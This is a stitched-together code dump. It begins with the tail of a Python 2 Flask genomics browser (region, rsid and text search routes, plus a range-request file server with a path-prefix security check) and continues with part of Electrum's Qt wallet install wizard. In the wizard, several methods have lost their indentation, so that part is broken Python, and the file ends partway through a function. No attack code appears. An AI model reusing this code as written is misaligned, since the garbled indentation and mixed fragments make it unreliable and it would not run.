                return render_template(
                    'region.html',
                    genes_in_region=None,
                    variants_in_region=None,
                    chrom=chrom,
                    start=start,
                    stop=stop,
                    coverage=None
                )
            # Widen a single-base region so there is something to draw.
            if start == stop:
                start -= 20
                stop += 20
            genes_in_region = lookups.get_genes_in_region(db, chrom, start, stop)
            variants_in_region = lookups.get_variants_in_region(db, chrom, start, stop)
            xstart = get_xpos(chrom, start)
            xstop = get_xpos(chrom, stop)
            coverage_array = lookups.get_coverage_for_bases(db, xstart, xstop)
            # NOTE(review): unlike gene/transcript pages, t is never stored back
            # with cache.set here -- confirm whether that is intentional.
            t = render_template(
                'region.html',
                genes_in_region=genes_in_region,
                variants_in_region=variants_in_region,
                chrom=chrom,
                start=start,
                stop=stop,
                coverage=coverage_array
            )
        print 'Rendering region: %s' % region_id
        return t
    except Exception, e:
        print 'Failed on region:', region_id, ';Error=', traceback.format_exc()
        abort(404)
@app.route('/dbsnp/<rsid>')
def dbsnp_page(rsid):
    """Render a region-style page listing all variants sharing the given rsid."""
    db = get_db()
    try:
        variants = lookups.get_variants_by_rsid(db, rsid)
        # No coordinates for an rsid page; the template handles None.
        chrom = None
        start = None
        stop = None
        print 'Rendering rsid: %s' % rsid
        return render_template(
            'region.html',
            rsid=rsid,
            variants_in_region=variants,
            chrom=chrom,
            start=start,
            stop=stop,
            coverage=None,
            genes_in_region=None
        )
    except Exception, e:
        print 'Failed on rsid:', rsid, ';Error=', traceback.format_exc()
        abort(404)
@app.route('/not_found/<query>')
@app.errorhandler(404)
def not_found_page(query):
    """Render the 'not found' page for a query, with a 404 status code."""
    # NOTE(review): registered both as a route and as the 404 errorhandler; when
    # invoked as an errorhandler, `query` receives the error object -- confirm.
    return render_template(
        'not_found.html',
        query=query
    ), 404
@app.route('/error/<query>')
@app.errorhandler(404)
def error_page(query):
    """Render the generic error page for a query, with a 404 status code."""
    # NOTE(review): also registered as a 404 errorhandler (see not_found_page);
    # only one handler can win that registration -- confirm intended.
    return render_template(
        'error.html',
        query=query
    ), 404
@app.route('/downloads')
def downloads_page():
    """Render the static downloads page."""
    return render_template('downloads.html')
@app.route('/about')
def about_page():
    """Render the static about page."""
    return render_template('about.html')
@app.route('/participants')
def participants_page():
    """Render the participants page."""
    # NOTE(review): renders 'about.html', same as /about -- confirm intended.
    return render_template('about.html')
@app.route('/terms')
def terms_page():
    """Render the static terms-of-use page."""
    return render_template('terms.html')
@app.route('/contact')
def contact_page():
    """Render the static contact page."""
    return render_template('contact.html')
@app.route('/faq')
def faq_page():
    """Render the static FAQ page."""
    return render_template('faq.html')
@app.route('/text')
def text_page():
    """Plain-text search endpoint: resolve ?text= and return a short gene summary."""
    db = get_db()
    query = request.args.get('text')
    datatype, identifier = lookups.get_awesomebar_result(db, query)
    if datatype in ['gene', 'transcript']:
        gene = lookups.get_gene(db, identifier)
        link = "http://genome.ucsc.edu/cgi-bin/hgTracks?db=hg19&position=chr%(chrom)s%%3A%(start)s-%(stop)s" % gene
        output = '''Searched for %s. Found %s.
%s; Canonical: %s.
%s''' % (query, identifier, gene['full_gene_name'], gene['canonical_transcript'], link)
        # Append OMIM info when available.
        output += '' if 'omim_accession' not in gene else '''
In OMIM: %(omim_description)s
http://omim.org/entry/%(omim_accession)s''' % gene
        return output
    elif datatype == 'error' or datatype == 'not_found':
        return "Gene/transcript %s not found" % query
    else:
        return "Search types other than gene transcript not yet supported"
@app.route('/read_viz/<path:path>')
def read_viz_files(path):
    """
    Serve read-visualization files from READ_VIZ_DIR, honoring the igv.js
    'Range' header with partial-content (HTTP 206) responses for .bam subsets.
    """
    read_viz_dir = os.path.abspath(app.config["READ_VIZ_DIR"])
    full_path = os.path.abspath(os.path.join(read_viz_dir, path))

    # security check - only files under READ_VIZ_DIR should be accessible.
    # SECURITY FIX: compare against the directory prefix *plus* a path separator;
    # a bare startswith(READ_VIZ_DIR) also matched sibling paths such as
    # "<READ_VIZ_DIR>_other/...".
    if not full_path.startswith(read_viz_dir + os.sep):
        return "Invalid path: %s" % path

    # handle igv.js Range header which it uses to request a subset of a .bam
    range_header = request.headers.get('Range', None)
    if not range_header:
        return send_from_directory(app.config["READ_VIZ_DIR"], path)

    m = re.search(r'(\d+)-(\d*)', range_header)
    if not m:
        error_msg = "ERROR: unexpected range header syntax: %s" % range_header
        logging.error(error_msg)
        return error_msg

    size = os.path.getsize(full_path)
    offset = int(m.group(1))
    # An open-ended range ("start-") runs to the end of the file.
    length = int(m.group(2) or size) - offset

    with open(full_path, 'rb') as f:
        f.seek(offset)
        data = f.read(length)

    rv = Response(data, 206, mimetype="application/octet-stream", direct_passthrough=True)
    rv.headers.add('Content-Range', 'bytes {0}-{1}/{2}'.format(offset, offset + length - 1, size))

    logging.info("readviz: range request: %s-%s %s" % (m.group(1), m.group(2), full_path))
    return rv
if __name__ == "__main__":
    # Entry point: serve the Flask app via the flask-runner CLI wrapper.
    runner = Runner(app)  # adds Flask command line options for setting host, port, etc.
    runner.run()
|
installwizard.py | # Copyright (C) 2018 The Electrum developers
# Distributed under the MIT software license, see the accompanying
# file LICENCE or http://www.opensource.org/licenses/mit-license.php
import os
import json
import sys
import threading
import traceback
from typing import Tuple, List, Callable, NamedTuple, Optional, TYPE_CHECKING
from functools import partial
from PyQt5.QtCore import QRect, QEventLoop, Qt, pyqtSignal
from PyQt5.QtGui import QPalette, QPen, QPainter, QPixmap
from PyQt5.QtWidgets import (QWidget, QDialog, QLabel, QHBoxLayout, QMessageBox,
QVBoxLayout, QLineEdit, QFileDialog, QPushButton,
QGridLayout, QSlider, QScrollArea, QApplication)
from electrum.wallet import Wallet, Abstract_Wallet
from electrum.storage import WalletStorage, StorageReadWriteError
from electrum.util import UserCancelled, InvalidPassword, WalletFileException, get_new_wallet_name
from electrum.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET, GoBack, ReRunDialog
from electrum.network import Network
from electrum.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import (MessageBoxMixin, Buttons, icon_path, ChoicesLayout, WWLabel,
InfoButton, char_width_in_lineedit, PasswordLineEdit)
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
from .bip39_recovery_dialog import Bip39RecoveryDialog
from electrum.plugin import run_hook, Plugins
if TYPE_CHECKING:
from electrum.simple_config import SimpleConfig
from electrum.wallet_db import WalletDB
from . import ElectrumGui
# Password-entry prompt shown when creating a software wallet.
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
                     + _("Leave this field empty if you want to disable encryption.")
# Prompt for optionally encrypting the wallet *file* of a hardware wallet.
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
                            + _("Your wallet file does not contain secrets, mostly just metadata. ") \
                            + _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
                            + _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
# Help text explaining script-type-prefixed WIF private keys.
WIF_HELP_TEXT = (_('WIF keys are typed in Electrum, based on script type.') + '\n\n' +
                 _('A few examples') + ':\n' +
                 'p2pkh:KxZcY47uGp9a... \t-> 1DckmggQM...\n' +
                 'p2wpkh-p2sh:KxZcY47uGp9a... \t-> 3NhNeZQXF...\n' +
                 'p2wpkh:KxZcY47uGp9a... \t-> bc1q3fjfk...')
# note: full key is KxZcY47uGp9aVQAb6VVvuBs8SwHKgkSR2DbZUzjDzXf2N2GPhG9n
# Warning shown when a BIP39 passphrase contains unusual whitespace (issue #4566).
MSG_PASSPHRASE_WARN_ISSUE4566 = _("Warning") + ": "\
                                + _("You have multiple consecutive whitespaces or leading/trailing "
                                    "whitespaces in your passphrase.") + " " \
                                + _("This is discouraged.") + " " \
                                + _("Due to a bug, old versions of Electrum will NOT be creating the "
                                    "same wallet as newer versions or other software.")
class CosignWidget(QWidget):
    """Pie-chart widget visualising an m-of-n multisig setup: m green slices out of n."""
    size = 120

    def __init__(self, m, n):
        QWidget.__init__(self)
        self.R = QRect(0, 0, self.size, self.size)
        self.setGeometry(self.R)
        self.setMinimumHeight(self.size)
        self.setMaximumHeight(self.size)
        self.m = m
        self.n = n

    def set_n(self, n):
        """Change the total number of cosigners and repaint."""
        self.n = n
        self.update()

    def set_m(self, m):
        """Change the number of required signatures and repaint."""
        self.m = m
        self.update()

    def paintEvent(self, event):
        """Draw one pie slice per cosigner: green for required ones, gray otherwise."""
        background = self.palette().color(QPalette.Background)
        painter = QPainter()
        painter.begin(self)
        painter.setPen(QPen(background, 7, Qt.SolidLine))
        painter.setRenderHint(QPainter.Antialiasing)
        painter.setBrush(Qt.gray)
        for slice_index in range(self.n):
            # Qt angles are expressed in 1/16th of a degree.
            start_angle = int(16 * 360 * slice_index / self.n)
            span_angle = int(16 * 360 * 1 / self.n)
            painter.setBrush(Qt.green if slice_index < self.m else Qt.gray)
            painter.drawPie(self.R, start_angle, span_angle)
        painter.end()
def wizard_dialog(func):
    """
    Decorator for InstallWizard dialog methods.

    Runs the decorated dialog, feeds its return value (normalized to a tuple)
    into the ``run_next`` keyword argument, and translates GoBack/ReRunDialog
    exceptions into the wizard's back/re-run navigation. Raises UserCancelled
    when there is no earlier dialog to go back to.
    """
    def func_wrapper(*args, **kwargs):
        run_next = kwargs['run_next']
        wizard = args[0]  # type: InstallWizard
        while True:
            #wizard.logger.debug(f"dialog stack. len: {len(wizard._stack)}. stack: {wizard._stack}")
            # Back acts as Cancel on the very first dialog.
            wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
            # current dialog
            try:
                out = func(*args, **kwargs)
                if type(out) is not tuple:
                    out = (out,)
            except GoBack:
                if not wizard.can_go_back():
                    wizard.close()
                    raise UserCancelled
                else:
                    # to go back from the current dialog, we just let the caller unroll the stack:
                    raise
            # next dialog
            try:
                while True:
                    try:
                        run_next(*out)
                    except ReRunDialog:
                        # restore state, and then let the loop re-run next
                        wizard.go_back(rerun_previous=False)
                    else:
                        break
            except GoBack as e:
                # to go back from the next dialog, we ask the wizard to restore state
                wizard.go_back(rerun_previous=False)
                # and we re-run the current dialog
                if wizard.can_go_back():
                    # also rerun any calculations that might have populated the inputs to the current dialog,
                    # by going back to just after the *previous* dialog finished
                    raise ReRunDialog() from e
                else:
                    continue
            else:
                break
    return func_wrapper
class WalletAlreadyOpenInMemory(Exception):
    """Raised when the wallet file being opened is already loaded in memory;
    carries the already-open wallet instance."""

    def __init__(self, wallet: Abstract_Wallet):
        super().__init__()
        # The live wallet object that is already open, so callers can reuse it.
        self.wallet = wallet
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
    """Qt implementation of BaseWizard: drives wallet creation/restore dialogs."""

    # Emitted (possibly from another thread) to close the wizard via accept().
    accept_signal = pyqtSignal()
    def __init__(self, config: 'SimpleConfig', app: QApplication, plugins: 'Plugins', *, gui_object: 'ElectrumGui'):
        """Build the wizard window and wire Back/Next buttons into a nested event loop."""
        QDialog.__init__(self, None)
        BaseWizard.__init__(self, config, plugins)
        self.setWindowTitle('Electrum - ' + _('Install Wizard'))
        self.app = app
        self.config = config
        self.gui_thread = gui_object.gui_thread
        self.setMinimumSize(600, 400)
        self.accept_signal.connect(self.accept)
        self.title = QLabel()
        self.main_widget = QWidget()
        self.back_button = QPushButton(_("Back"), self)
        self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
        self.next_button = QPushButton(_("Next"), self)
        self.next_button.setDefault(True)
        self.logo = QLabel()
        self.please_wait = QLabel(_("Please wait..."))
        self.please_wait.setAlignment(Qt.AlignCenter)
        self.icon_filename = None
        # Nested event loop exit codes: 0 = cancelled, 1 = back, 2 = next.
        self.loop = QEventLoop()
        self.rejected.connect(lambda: self.loop.exit(0))
        self.back_button.clicked.connect(lambda: self.loop.exit(1))
        self.next_button.clicked.connect(lambda: self.loop.exit(2))
        outer_vbox = QVBoxLayout(self)
        inner_vbox = QVBoxLayout()
        inner_vbox.addWidget(self.title)
        inner_vbox.addWidget(self.main_widget)
        inner_vbox.addStretch(1)
        inner_vbox.addWidget(self.please_wait)
        inner_vbox.addStretch(1)
        scroll_widget = QWidget()
        scroll_widget.setLayout(inner_vbox)
        scroll = QScrollArea()
        scroll.setWidget(scroll_widget)
        scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
        scroll.setWidgetResizable(True)
        icon_vbox = QVBoxLayout()
        icon_vbox.addWidget(self.logo)
        icon_vbox.addStretch(1)
        hbox = QHBoxLayout()
        hbox.addLayout(icon_vbox)
        hbox.addSpacing(5)
        hbox.addWidget(scroll)
        hbox.setStretchFactor(scroll, 1)
        outer_vbox.addLayout(hbox)
        outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
        self.set_icon('electrum.png')
        self.show()
        self.raise_()
        self.refresh_gui() # Need for QT on MacOSX. Lame.
    def select_storage(self, path, get_wallet_from_daemon) -> Tuple[str, Optional[WalletStorage]]:
        """Let the user pick (or create) a wallet file, decrypting it if needed.

        Returns (path, storage); storage is None if the file does not exist yet.
        Raises UserCancelled on cancel and WalletAlreadyOpenInMemory when the
        chosen wallet is already loaded by the daemon.
        """
        vbox = QVBoxLayout()
        hbox = QHBoxLayout()
        hbox.addWidget(QLabel(_('Wallet') + ':'))
        name_e = QLineEdit()
        hbox.addWidget(name_e)
        button = QPushButton(_('Choose...'))
        hbox.addWidget(button)
        vbox.addLayout(hbox)
        msg_label = WWLabel('')
        vbox.addWidget(msg_label)
        hbox2 = QHBoxLayout()
        pw_e = PasswordLineEdit('', self)
        pw_e.setFixedWidth(17 * char_width_in_lineedit())
        pw_label = QLabel(_('Password') + ':')
        hbox2.addWidget(pw_label)
        hbox2.addWidget(pw_e)
        hbox2.addStretch()
        vbox.addLayout(hbox2)
        vbox.addSpacing(50)
        vbox_create_new = QVBoxLayout()
        vbox_create_new.addWidget(QLabel(_('Alternatively') + ':'), alignment=Qt.AlignLeft)
        button_create_new = QPushButton(_('Create New Wallet'))
        button_create_new.setMinimumWidth(120)
        vbox_create_new.addWidget(button_create_new, alignment=Qt.AlignLeft)
        widget_create_new = QWidget()
        widget_create_new.setLayout(vbox_create_new)
        vbox_create_new.setContentsMargins(0, 0, 0, 0)
        vbox.addWidget(widget_create_new)
        self.set_layout(vbox, title=_('Electrum wallet'))
        temp_storage = None # type: Optional[WalletStorage]
        wallet_folder = os.path.dirname(path)
        def on_choose():
            # Native file picker; feeds the chosen path back through name_e.
            path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
            if path:
                name_e.setText(path)
        def on_filename(filename):
            # Re-evaluate the chosen filename: probe the storage and update the
            # message label, Next button, password fields and "create new" button.
            # FIXME? "filename" might contain ".." (etc) and hence sketchy path traversals are possible
            nonlocal temp_storage
            temp_storage = None
            msg = None
            if filename:
                path = os.path.join(wallet_folder, filename)
                wallet_from_memory = get_wallet_from_daemon(path)
                try:
                    if wallet_from_memory:
                        temp_storage = wallet_from_memory.storage # type: Optional[WalletStorage]
                    else:
                        temp_storage = WalletStorage(path)
                except (StorageReadWriteError, WalletFileException) as e:
                    msg = _('Cannot read file') + f'\n{repr(e)}'
                except Exception as e:
                    self.logger.exception('')
                    msg = _('Cannot read file') + f'\n{repr(e)}'
            else:
                msg = ""
            self.next_button.setEnabled(temp_storage is not None)
            user_needs_to_enter_password = False
            if temp_storage:
                if not temp_storage.file_exists():
                    msg =_("This file does not exist.") + '\n' \
                          + _("Press 'Next' to create this wallet, or choose another file.")
                elif not wallet_from_memory:
                    if temp_storage.is_encrypted_with_user_pw():
                        msg = _("This file is encrypted with a password.") + '\n' \
                              + _('Enter your password or choose another file.')
                        user_needs_to_enter_password = True
                    elif temp_storage.is_encrypted_with_hw_device():
                        msg = _("This file is encrypted using a hardware device.") + '\n' \
                              + _("Press 'Next' to choose device to decrypt.")
                    else:
                        msg = _("Press 'Next' to open this wallet.")
                else:
                    msg = _("This file is already open in memory.") + "\n" \
                          + _("Press 'Next' to create/focus window.")
            if msg is None:
                msg = _('Cannot read file')
            msg_label.setText(msg)
            widget_create_new.setVisible(bool(temp_storage and temp_storage.file_exists()))
            if user_needs_to_enter_password:
                pw_label.show()
                pw_e.show()
                pw_e.setFocus()
            else:
                pw_label.hide()
                pw_e.hide()
        button.clicked.connect(on_choose)
        button_create_new.clicked.connect(
            partial(
                name_e.setText,
                get_new_wallet_name(wallet_folder)))
        name_e.textChanged.connect(on_filename)
        name_e.setText(os.path.basename(path))
        def run_user_interaction_loop():
            # Loop until a usable (existing+decrypted, or to-be-created) storage
            # is selected, or the user cancels.
            while True:
                if self.loop.exec_() != 2: # 2 = next
                    raise UserCancelled()
                assert temp_storage
                if temp_storage.file_exists() and not temp_storage.is_encrypted():
                    break
                if not temp_storage.file_exists():
                    break
                wallet_from_memory = get_wallet_from_daemon(temp_storage.path)
                if wallet_from_memory:
                    raise WalletAlreadyOpenInMemory(wallet_from_memory)
                if temp_storage.file_exists() and temp_storage.is_encrypted():
                    if temp_storage.is_encrypted_with_user_pw():
                        password = pw_e.text()
                        try:
                            temp_storage.decrypt(password)
                            break
                        except InvalidPassword as e:
                            self.show_message(title=_('Error'), msg=str(e))
                            continue
                        except BaseException as e:
                            self.logger.exception('')
                            self.show_message(title=_('Error'), msg=repr(e))
                            raise UserCancelled()
                    elif temp_storage.is_encrypted_with_hw_device():
                        try:
                            self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET, storage=temp_storage)
                        except InvalidPassword as e:
                            self.show_message(title=_('Error'),
                                              msg=_('Failed to decrypt using this hardware device.') + '\n' +
                                                  _('If you use a passphrase, make sure it is correct.'))
                            self.reset_stack()
                            # restart the whole selection flow after a failed hw decrypt
                            return self.select_storage(path, get_wallet_from_daemon)
                        except (UserCancelled, GoBack):
                            raise
                        except BaseException as e:
                            self.logger.exception('')
                            self.show_message(title=_('Error'), msg=repr(e))
                            raise UserCancelled()
                        if temp_storage.is_past_initial_decryption():
                            break
                        else:
                            raise UserCancelled()
                    else:
                        raise Exception('Unexpected encryption version')
        try:
            run_user_interaction_loop()
        finally:
            try:
                # Clear the password from the widget regardless of outcome.
                pw_e.clear()
            except RuntimeError: # wrapped C/C++ object has been deleted.
                pass # happens when decrypting with hw device
        return temp_storage.path, (temp_storage if temp_storage.file_exists() else None)
    def run_upgrades(self, storage: WalletStorage, db: 'WalletDB') -> None:
        """Handle legacy wallet files before opening them.

        Covers: splitting multi-account wallets, finishing incompletely created
        wallets, and upgrading the db format. May raise UserCancelled or
        WalletFileException.
        """
        path = storage.path
        if db.requires_split():
            self.hide()
            msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n"
                    "Do you want to split your wallet into multiple files?").format(path)
            if not self.question(msg):
                return
            file_list = db.split_accounts(path)
            msg = _('Your accounts have been moved to') + ':\n' + '\n'.join(file_list) + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
            if self.question(msg):
                os.remove(path)
                self.show_warning(_('The file was removed'))
            # raise now, to avoid having the old storage opened
            raise UserCancelled()
        action = db.get_action()
        if action and db.requires_upgrade():
            raise WalletFileException('Incomplete wallet files cannot be upgraded.')
        if action:
            self.hide()
            msg = _("The file '{}' contains an incompletely created wallet.\n"
                    "Do you want to complete its creation now?").format(path)
            if not self.question(msg):
                if self.question(_("Do you want to delete '{}'?").format(path)):
                    os.remove(path)
                    self.show_warning(_('The file was removed'))
                return
            self.show()
            # resume the interrupted wizard flow from the stored action
            self.data = json.loads(storage.read())
            self.run(action)
            for k, v in self.data.items():
                db.put(k, v)
            db.write(storage)
            return
        if db.requires_upgrade():
            self.upgrade_db(storage, db)
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
self.logger.error("on_error", exc_info=exc_info)
self.show_error(str(exc_info[1]))
    def set_icon(self, filename):
        """Swap the wizard's side logo; return the previously set filename."""
        prior_filename, self.icon_filename = self.icon_filename, filename
        self.logo.setPixmap(QPixmap(icon_path(filename))
                            .scaledToWidth(60, mode=Qt.SmoothTransformation))
        return prior_filename
    def set_layout(self, layout, title=None, next_enabled=True):
        """Install `layout` as the wizard's current page content."""
        self.title.setText("<b>%s</b>"%title if title else "")
        self.title.setVisible(bool(title))
        # Get rid of any prior layout by assigning it to a temporary widget
        prior_layout = self.main_widget.layout()
        if prior_layout:
            QWidget().setLayout(prior_layout)
        self.main_widget.setLayout(layout)
        self.back_button.setEnabled(True)
        self.next_button.setEnabled(next_enabled)
        if next_enabled:
            self.next_button.setFocus()
        self.main_widget.setVisible(True)
        self.please_wait.setVisible(False)
    def exec_layout(self, layout, title=None, raise_on_cancel=True,
                    next_enabled=True, focused_widget=None):
        """Show `layout` and block until the user hits Back/Next or cancels.

        Raises UserCancelled on cancel (when raise_on_cancel) and GoBack on
        Back; otherwise switches to the "please wait" view and returns the
        nested-loop exit code (2 = next).
        """
        self.set_layout(layout, title, next_enabled)
        if focused_widget:
            focused_widget.setFocus()
        result = self.loop.exec_()
        if not result and raise_on_cancel:
            raise UserCancelled()
        if result == 1:
            raise GoBack from None
        self.title.setVisible(False)
        self.back_button.setEnabled(False)
        self.next_button.setEnabled(False)
        self.main_widget.setVisible(False)
        self.please_wait.setVisible(True)
        self.refresh_gui()
        return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
    def remove_from_recently_open(self, filename):
        """Drop `filename` from the config's recently-opened wallet list."""
        self.config.remove_from_recently_open(filename)
    def text_input(self, title, message, is_valid, allow_multi=False):
        """Show a free-form key entry page and return the validated text."""
        slayout = KeysLayout(parent=self, header_layout=message, is_valid=is_valid,
                             allow_multi=allow_multi, config=self.config)
        self.exec_layout(slayout, title, next_enabled=False)
        return slayout.get_text()
    def seed_input(self, title, message, is_seed, options):
        """Show a seed entry page; return (seed, is_bip39, is_ext)."""
        slayout = SeedLayout(
            title=message,
            is_seed=is_seed,
            options=options,
            parent=self,
            config=self.config,
        )
        self.exec_layout(slayout, title, next_enabled=False)
        return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
    @wizard_dialog
    def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False, show_wif_help=False):
        """Prompt for a master key, with an optional WIF help button."""
        header_layout = QHBoxLayout()
        label = WWLabel(message)
        label.setMinimumWidth(400)
        header_layout.addWidget(label)
        if show_wif_help:
            header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
        return self.text_input(title, header_layout, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, seed, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
    @wizard_dialog
    def show_seed_dialog(self, run_next, seed_text):
        """Display a newly generated seed; return whether 'ext' was selected."""
        title = _("Your wallet generation seed is:")
        slayout = SeedLayout(
            seed=seed_text,
            title=title,
            msg=True,
            options=['ext'],
            config=self.config,
        )
        self.exec_layout(slayout)
        return slayout.is_ext
    def pw_layout(self, msg, kind, force_disable_encrypt_cb):
        """Run a password entry page; return (password, encrypt_storage).

        Password fields are cleared even if the dialog raises.
        """
        pw_layout = PasswordLayout(
            msg=msg, kind=kind, OK_button=self.next_button,
            force_disable_encrypt_cb=force_disable_encrypt_cb)
        pw_layout.encrypt_cb.setChecked(True)
        try:
            self.exec_layout(pw_layout.layout(), focused_widget=pw_layout.new_pw)
            return pw_layout.new_password(), pw_layout.encrypt_cb.isChecked()
        finally:
            pw_layout.clear_password_fields()
    @wizard_dialog
    def request_password(self, run_next, force_disable_encrypt_cb=False):
        """Request the user enter a new password and confirm it.

        Returns a (password, encrypt_storage) tuple via pw_layout; the
        password is None for no password.
        """
        return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
    @wizard_dialog
    def request_storage_encryption(self, run_next):
        """Ask whether hardware-wallet storage should be encrypted; return bool."""
        playout = PasswordLayoutForHW(MSG_HW_STORAGE_ENCRYPTION)
        playout.encrypt_cb.setChecked(True)
        self.exec_layout(playout.layout())
        return playout.encrypt_cb.isChecked()
    @wizard_dialog
    def confirm_dialog(self, title, message, run_next):
        """Wizard step: show a message the user must acknowledge with Next."""
        self.confirm(message, title)
    def confirm(self, message, title):
        """Display `message` and block until the user proceeds (or cancels)."""
        label = WWLabel(message)
        vbox = QVBoxLayout()
        vbox.addWidget(label)
        self.exec_layout(vbox, title)
    @wizard_dialog
    def action_dialog(self, action, run_next):
        """Wizard step that simply runs the named wizard action."""
        self.run(action)
    def terminate(self, **kwargs):
        # Close the wizard via the accept signal (presumably so accept() runs
        # in the GUI thread even if called from elsewhere — confirm).
        self.accept_signal.emit()
    def waiting_dialog(self, task, msg, on_finished=None):
        """Run `task` in a worker thread while showing `msg`; blocks the caller
        but keeps pumping the Qt event loop until the thread finishes."""
        label = WWLabel(msg)
        vbox = QVBoxLayout()
        vbox.addSpacing(100)
        label.setMinimumWidth(300)
        label.setAlignment(Qt.AlignCenter)
        vbox.addWidget(label)
        self.set_layout(vbox, next_enabled=False)
        self.back_button.setEnabled(False)
        t = threading.Thread(target=task)
        t.start()
        while True:
            # poll at ~60 Hz so the GUI stays responsive while the task runs
            t.join(1.0/60)
            if t.is_alive():
                self.refresh_gui()
            else:
                break
        if on_finished:
            on_finished()
    def run_task_without_blocking_gui(self, task, *, msg=None):
        """Run `task` from the GUI thread without freezing the UI.

        Returns the task's result, or re-raises the exception it raised.
        """
        assert self.gui_thread == threading.current_thread(), 'must be called from GUI thread'
        if msg is None:
            msg = _("Please wait...")
        exc = None # type: Optional[Exception]
        res = None
        def task_wrapper():
            # Capture result/exception so they can cross the thread boundary.
            nonlocal exc
            nonlocal res
            try:
                res = task()
            except Exception as e:
                exc = e
        self.waiting_dialog(task_wrapper, msg=msg)
        if exc is None:
            return res
        else:
            raise exc
    @wizard_dialog
    def choice_dialog(self, title, message, choices, run_next):
        """Present (value, title) choices; return the selected value."""
        c_values = [x[0] for x in choices]
        c_titles = [x[1] for x in choices]
        clayout = ChoicesLayout(message, c_titles)
        vbox = QVBoxLayout()
        vbox.addLayout(clayout.layout())
        self.exec_layout(vbox, title)
        action = c_values[clayout.selected_index()]
        return action
    def query_choice(self, msg, choices):
        """called by hardware wallets"""
        # Returns the index of the selected choice.
        clayout = ChoicesLayout(msg, choices)
        vbox = QVBoxLayout()
        vbox.addLayout(clayout.layout())
        self.exec_layout(vbox, '')
        return clayout.selected_index()
    @wizard_dialog
    def derivation_and_script_type_gui_specific_dialog(
            self,
            *,
            title: str,
            message1: str,
            choices: List[Tuple[str, str, str]],
            hide_choices: bool = False,
            message2: str,
            test_text: Callable[[str], int],
            run_next,
            default_choice_idx: int = 0,
            get_account_xpub=None,
    ) -> Tuple[str, str]:
        """Pick a script type and derivation path; return (path_text, choice).

        Each item of `choices` is (value, title, default_derivation_path).
        When get_account_xpub is given, a "Detect Existing Accounts" button
        can pre-fill both the script type and the derivation path.
        """
        vbox = QVBoxLayout()
        if get_account_xpub:
            button = QPushButton(_("Detect Existing Accounts"))
            def on_account_select(account):
                # Select the matching script-type radio button and fill the path.
                script_type = account["script_type"]
                if script_type == "p2pkh":
                    script_type = "standard"
                button_index = c_values.index(script_type)
                button = clayout.group.buttons()[button_index]
                button.setChecked(True)
                line.setText(account["derivation_path"])
            button.clicked.connect(lambda: Bip39RecoveryDialog(self, get_account_xpub, on_account_select))
            vbox.addWidget(button, alignment=Qt.AlignLeft)
            vbox.addWidget(QLabel(_("Or")))
        c_values = [x[0] for x in choices]
        c_titles = [x[1] for x in choices]
        c_default_text = [x[2] for x in choices]
        def on_choice_click(clayout):
            # Selecting a script type resets the path field to its default.
            idx = clayout.selected_index()
            line.setText(c_default_text[idx])
        clayout = ChoicesLayout(message1, c_titles, on_choice_click,
                                checked_index=default_choice_idx)
        if not hide_choices:
            vbox.addLayout(clayout.layout())
        vbox.addWidget(WWLabel(message2))
        line = QLineEdit()
        def on_text_change(text):
            self.next_button.setEnabled(test_text(text))
        line.textEdited.connect(on_text_change)
        on_choice_click(clayout) # set default text for "line"
        vbox.addWidget(line)
        self.exec_layout(vbox, title)
        choice = c_values[clayout.selected_index()]
        return str(line.text()), choice
    @wizard_dialog
    def line_dialog(self, run_next, title, message, default, test, warning='',
                    presets=(), warn_issue4566=False):
        """Single-line text input with optional preset buttons; return the text."""
        vbox = QVBoxLayout()
        vbox.addWidget(WWLabel(message))
        line = QLineEdit()
        line.setText(default)
        def f(text):
            self.next_button.setEnabled(test(text))
            if warn_issue4566:
                # warn when the text differs from its whitespace-normalised form
                text_whitespace_normalised = ' '.join(text.split())
                warn_issue4566_label.setVisible(text != text_whitespace_normalised)
        line.textEdited.connect(f)
        vbox.addWidget(line)
        vbox.addWidget(WWLabel(warning))
        warn_issue4566_label = WWLabel(MSG_PASSPHRASE_WARN_ISSUE4566)
        warn_issue4566_label.setVisible(False)
        vbox.addWidget(warn_issue4566_label)
        for preset in presets:
            # preset is (button_label, text_to_insert)
            button = QPushButton(preset[0])
            button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
